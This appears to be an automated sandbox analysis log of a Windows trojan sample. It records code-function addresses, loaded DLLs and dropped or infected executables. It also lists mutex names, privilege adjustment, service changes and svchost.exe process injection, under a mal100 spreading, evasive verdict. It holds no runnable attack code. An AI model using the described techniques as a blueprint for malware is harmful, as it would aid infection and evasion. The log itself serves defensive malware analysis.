          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_0040FCE00_2_0040FCE0
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_004221C50_2_004221C5
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_004362D20_2_004362D2
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_004803DA0_2_004803DA
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_0043242E0_2_0043242E
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_004225FA0_2_004225FA
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_0045E6160_2_0045E616
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_004166E10_2_004166E1
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_0043878F0_2_0043878F
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_004368440_2_00436844
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_004808570_2_00480857
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_004188080_2_00418808
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_004688890_2_00468889
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_0042CB210_2_0042CB21
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_00436DB60_2_00436DB6
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_00416F9E0_2_00416F9E
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_004130300_2_00413030
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_0042F1D90_2_0042F1D9
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_004231870_2_00423187
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_004012870_2_00401287
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_004214840_2_00421484
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_004155200_2_00415520
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_004276960_2_00427696
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_004157600_2_00415760
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_004219780_2_00421978
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_00439AB50_2_00439AB5
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_0051FCC80_2_0051FCC8
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_00487DDB0_2_00487DDB
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_00421D900_2_00421D90
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_0042BDA60_2_0042BDA6
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_0040DF000_2_0040DF00
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_00413FE00_2_00413FE0
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_00BA55E80_2_00BA55E8
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_02F900D90_2_02F900D9
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_02F551EE0_2_02F551EE
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_02F56EAF0_2_02F56EAF
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_02F8C7F00_2_02F8C7F0
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_02F837800_2_02F83780
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_02F8D5800_2_02F8D580
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_02F57B710_2_02F57B71
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_02F939A30_2_02F939A3
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_02F859800_2_02F85980
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_02F57F800_2_02F57F80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0040E8554_2_0040E855
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004010C84_2_004010C8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004010D04_2_004010D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0042F1D34_2_0042F1D3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004029F84_2_004029F8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_00402A004_2_00402A00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004032D04_2_004032D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0041040A4_2_0041040A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004104134_2_00410413
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004015004_2_00401500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_00416DA34_2_00416DA3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0040E6434_2_0040E643
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004106334_2_00410633
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004026F04_2_004026F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0040E7884_2_0040E788
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0040E7934_2_0040E793
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03C003E64_2_03C003E6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B4E3F04_2_03B4E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BFA3524_2_03BFA352
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BC02C04_2_03BC02C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BE02744_2_03BE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BF41A24_2_03BF41A2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03C001AA4_2_03C001AA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BF81CC4_2_03BF81CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BDA1184_2_03BDA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B301004_2_03B30100
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BC81584_2_03BC8158
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BD20004_2_03BD2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B3C7C04_2_03B3C7C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B407704_2_03B40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B647504_2_03B64750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B5C6E04_2_03B5C6E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03C005914_2_03C00591
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B405354_2_03B40535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BEE4F64_2_03BEE4F6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BE44204_2_03BE4420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BF24464_2_03BF2446
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BF6BD74_2_03BF6BD7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BFAB404_2_03BFAB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B3EA804_2_03B3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B429A04_2_03B429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03C0A9A64_2_03C0A9A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B569624_2_03B56962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B268B84_2_03B268B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6E8F04_2_03B6E8F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B4A8404_2_03B4A840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B428404_2_03B42840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BBEFA04_2_03BBEFA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B4CFE04_2_03B4CFE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B32FC84_2_03B32FC8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B60F304_2_03B60F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BE2F304_2_03BE2F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B82F284_2_03B82F28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB4F404_2_03BB4F40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B52E904_2_03B52E90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BFCE934_2_03BFCE93
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BFEEDB4_2_03BFEEDB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BFEE264_2_03BFEE26
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B40E594_2_03B40E59
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B58DBF4_2_03B58DBF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B3ADE04_2_03B3ADE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BDCD1F4_2_03BDCD1F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B4AD004_2_03B4AD00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BE0CB54_2_03BE0CB5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B30CF24_2_03B30CF2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B40C004_2_03B40C00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B8739A4_2_03B8739A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BF132D4_2_03BF132D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B2D34C4_2_03B2D34C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B452A04_2_03B452A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BE12ED4_2_03BE12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B5B2C04_2_03B5B2C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B4B1B04_2_03B4B1B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03C0B16B4_2_03C0B16B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B2F1724_2_03B2F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B7516C4_2_03B7516C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BF70E94_2_03BF70E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BFF0E04_2_03BFF0E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BEF0CC4_2_03BEF0CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B470C04_2_03B470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BFF7B04_2_03BFF7B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BF16CC4_2_03BF16CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B856304_2_03B85630
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03C095C34_2_03C095C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BDD5B04_2_03BDD5B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BF75714_2_03BF7571
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BFF43F4_2_03BFF43F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B314604_2_03B31460
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B5FB804_2_03B5FB80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB5BF04_2_03BB5BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B7DBF94_2_03B7DBF9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BFFB764_2_03BFFB76
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BDDAAC4_2_03BDDAAC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B85AA04_2_03B85AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BE1AA34_2_03BE1AA3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BEDAC64_2_03BEDAC6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB3A6C4_2_03BB3A6C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BFFA494_2_03BFFA49
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BF7A464_2_03BF7A46
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BD59104_2_03BD5910
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B499504_2_03B49950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B5B9504_2_03B5B950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B438E04_2_03B438E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BAD8004_2_03BAD800
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BFFFB14_2_03BFFFB1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B41F924_2_03B41F92
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B03FD24_2_03B03FD2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B03FD54_2_03B03FD5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BFFF094_2_03BFFF09
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B49EB04_2_03B49EB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B5FDC04_2_03B5FDC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BF7D734_2_03BF7D73
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BF1D5A4_2_03BF1D5A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B43D404_2_03B43D40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BFFCF24_2_03BFFCF2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB9C324_2_03BB9C32
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: String function: 00407DE1 appears 35 times
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: String function: 00428900 appears 41 times
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: String function: 00420AE3 appears 70 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03B75130 appears 58 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03BBF290 appears 105 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03BAEA12 appears 86 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03B2B970 appears 280 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03B87E54 appears 111 times
          Source: LiuUGJK9vH.exe, 00000000.00000003.1466548663.00000000041D3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs LiuUGJK9vH.exe
          Source: LiuUGJK9vH.exe, 00000000.00000003.1459690952.0000000003EF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamearmsvc.exeN vs LiuUGJK9vH.exe
          Source: LiuUGJK9vH.exe, 00000000.00000003.1478595540.0000000004E9D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs LiuUGJK9vH.exe
          Source: LiuUGJK9vH.exe, 00000000.00000003.1463774651.0000000003EF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameALG.exej% vs LiuUGJK9vH.exe
          Source: unknownDriver loaded: C:\Windows\System32\drivers\AppVStrm.sys
          Source: LiuUGJK9vH.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: LiuUGJK9vH.exeStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: armsvc.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: alg.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: AppVClient.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: DiagnosticsHub.StandardCollector.Service.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: LiuUGJK9vH.exeStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: armsvc.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: alg.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: AppVClient.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: DiagnosticsHub.StandardCollector.Service.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: classification engineClassification label: mal100.spre.troj.evad.winEXE@6/10@2/2
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_0046A06A GetLastError,FormatMessageW,0_2_0046A06A
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_004581CB AdjustTokenPrivileges,CloseHandle,0_2_004581CB
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_004587E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_004587E1
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_0046B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0046B333
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_0047EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0047EE0D
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_0046C397 CoInitialize,CoCreateInstance,CoUninitialize,0_2_0046C397
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_00404E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00404E89
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_02F7CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,0_2_02F7CBD0
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeFile created: C:\Users\user\AppData\Roaming\a49546759c90d829.binJump to behavior
          Source: C:\Windows\System32\AppVClient.exeMutant created: \BaseNamedObjects\Global\Multiarch.m0yv-a49546759c90d8299ea72c54-b
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-a49546759c90d8293d78ffaf-b
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-a49546759c90d829-inf
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeFile created: C:\Users\user\AppData\Local\Temp\autC621.tmpJump to behavior
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: LiuUGJK9vH.exeReversingLabs: Detection: 91%
          Source: unknownProcess created: C:\Users\user\Desktop\LiuUGJK9vH.exe "C:\Users\user\Desktop\LiuUGJK9vH.exe"
          Source: unknownProcess created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
          Source: unknownProcess created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\LiuUGJK9vH.exe"
          Source: unknownProcess created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\LiuUGJK9vH.exe"Jump to behavior
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeSection loaded: wsock32.dllJump to behavior
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeSection loaded: webio.dllJump to behavior
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\alg.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\alg.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\alg.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\AppVClient.exeSection loaded: appvpolicy.dllJump to behavior
          Source: C:\Windows\System32\AppVClient.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\AppVClient.exeSection loaded: wtsapi32.dllJump to behavior
          Source: C:\Windows\System32\AppVClient.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Windows\System32\AppVClient.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\AppVClient.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\AppVClient.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\AppVClient.exeSection loaded: samcli.dllJump to behavior
          Source: C:\Windows\System32\AppVClient.exeSection loaded: logoncli.dllJump to behavior
          Source: C:\Windows\System32\AppVClient.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\AppVClient.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\AppVClient.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\AppVClient.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\AppVClient.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\AppVClient.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\AppVClient.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\AppVClient.exeSection loaded: appmanagementconfiguration.dllJump to behavior
          Source: C:\Windows\System32\AppVClient.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{52BC3999-6E52-4E8A-87C4-0A2A0CC359B1}\InProcServer32Jump to behavior
          Source: LiuUGJK9vH.exeStatic file information: File size 1761792 > 1048576
          Source: LiuUGJK9vH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: LiuUGJK9vH.exe, 00000000.00000003.1459636308.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe.0.dr
          Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: DiagnosticsHub.StandardCollector.Service.exe.0.dr
          Source: Binary string: AppVClient.pdbGCTL source: AppVClient.exe.0.dr
          Source: Binary string: ALG.pdbGCTL source: LiuUGJK9vH.exe, 00000000.00000003.1463706750.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
          Source: Binary string: AppVClient.pdb source: AppVClient.exe.0.dr
          Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: DiagnosticsHub.StandardCollector.Service.exe.0.dr
          Source: Binary string: wntdll.pdbUGP source: LiuUGJK9vH.exe, 00000000.00000003.1466769088.0000000004250000.00000004.00001000.00020000.00000000.sdmp, LiuUGJK9vH.exe, 00000000.00000003.1472318667.0000000004250000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1751681677.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1793138117.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1749096738.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1793138117.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp
